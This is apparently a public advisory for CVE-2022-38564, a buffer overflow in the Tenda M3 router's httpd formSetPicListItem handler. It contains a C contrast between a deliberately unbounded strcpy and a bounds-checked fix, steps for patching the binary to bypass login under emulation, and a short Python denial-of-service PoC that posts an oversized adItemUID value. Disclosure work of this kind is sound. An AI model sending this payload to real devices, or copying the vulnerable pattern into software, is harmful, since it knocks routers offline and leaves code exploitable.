CVE-2022-38564: Vuln/Tenda M3/formSetPicListItem at main · xxy1126/Vuln

Tenda M3 V1.0.0.12(4856) was discovered to contain a buffer overflow vulnerability in the function formSetPicListItem. This vulnerability allows attackers to cause a Denial of Service (DoS) via the adItemUID parameter.


Tenda M3 contains Buffer Overflow Vulnerability

Overview

  • type: buffer overflow vulnerability

  • supplier: Tenda https://www.tenda.com

  • product: TendaM3 https://www.tenda.com.cn/product/M3.html

  • firmware download: https://www.tenda.com.cn/download/detail-3133.html

  • affected version: TendaM3 v1.0.0.12(4856)

Description

1. Vulnerability Details

The httpd binary in the /bin directory has a buffer overflow. The vulnerability is in the function formSetPicListItem.

In this function, the POST parameter adItemUID is copied into a buffer in .bss.

If v21 (the copied value) is too long, the copy overruns that buffer and causes a denial of service (DoS).
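As an added illustration, not the advisory's or Tenda's code, the following shows the pattern described above: a form handler that copies a POST parameter into a fixed-size global (.bss) buffer without a length check, beside a hardened handler that measures the value against the destination size before copying and rejects anything that does not fit. The buffer size, function names and the constructed inputs are assumptions.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed destination size; the advisory does not state the real one.
 * Global arrays with no initializer are placed in .bss, as in httpd. */
#define PIC_UID_BUF_SIZE 64

static char g_pic_uid_vuln[PIC_UID_BUF_SIZE];   /* "before": unbounded copy */
static char g_pic_uid_safe[PIC_UID_BUF_SIZE];   /* "after": bounded copy    */

/* Vulnerable pattern (hypothetical name): the attacker-controlled POST
 * parameter is copied with no comparison against the destination size,
 * so a value of PIC_UID_BUF_SIZE bytes or more writes past the buffer.
 * Shown for contrast only; it is never called here with oversized input. */
static void set_pic_uid_vulnerable(const char *ad_item_uid)
{
    strcpy(g_pic_uid_vuln, ad_item_uid);
}

/* Hardened handler (hypothetical name): look for the terminating NUL only
 * within the first PIC_UID_BUF_SIZE bytes; if it is not there the value
 * cannot fit, so reject it and leave the buffer untouched. Returns true
 * when the value was stored. */
static bool set_pic_uid_hardened(const char *ad_item_uid)
{
    if (ad_item_uid == NULL)
        return false;
    const char *nul = memchr(ad_item_uid, '\0', PIC_UID_BUF_SIZE);
    if (nul == NULL)
        return false;                       /* too long for buffer + NUL */
    size_t len = (size_t)(nul - ad_item_uid);
    memcpy(g_pic_uid_safe, ad_item_uid, len + 1);
    return true;
}

static const char *get_pic_uid_safe(void)
{
    return g_pic_uid_safe;
}

/* Constructed test input: n bytes of 'a', like the 0x2000-byte value in
 * the PoC. Capped at 0x2000 so the static backing buffer always suffices. */
static const char *constructed_uid_of_length(size_t n)
{
    static char buf[0x2000 + 1];
    if (n > 0x2000)
        n = 0x2000;
    memset(buf, 'a', n);
    buf[n] = '\0';
    return buf;
}

int main(void)
{
    set_pic_uid_vulnerable("pic-0001");          /* in-bounds use only */
    printf("vulnerable handler stored: %s\n", g_pic_uid_vuln);

    printf("short value accepted: %d\n", set_pic_uid_hardened("pic-0001"));
    printf("0x2000-byte value accepted: %d\n",
           set_pic_uid_hardened(constructed_uid_of_length(0x2000)));
    printf("buffer after rejected request: %s\n", get_pic_uid_safe());
    return 0;
}
```

The check in the hardened handler is the one the advisory says is missing: the length of the client-supplied value is compared to the destination size before any byte is written, and an oversized request is refused instead of overrunning .bss and crashing httpd.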

2. Reproducing the vulnerability and POC

Use qemu-arm-static to run the httpd; it needs to be patched before it will run.

  • In the main function, the ConnectCfm function did not work properly, so I patched it to a NOP.
  • The R7WebsSecurityHandler function is used for permission control, and I modified it so that URLs which can normally only be accessed after login are reachable.

POC of DoS (denial of service)

```python
import requests

# oversized adItemUID value, as described in the vulnerability details
data = {"adItemUID": "a" * 0x2000}
cookies = {"user": "admin"}
res = requests.post("http://127.0.0.1/goform/setPicListItem", data=data, cookies=cookies)
print(res.content)
```
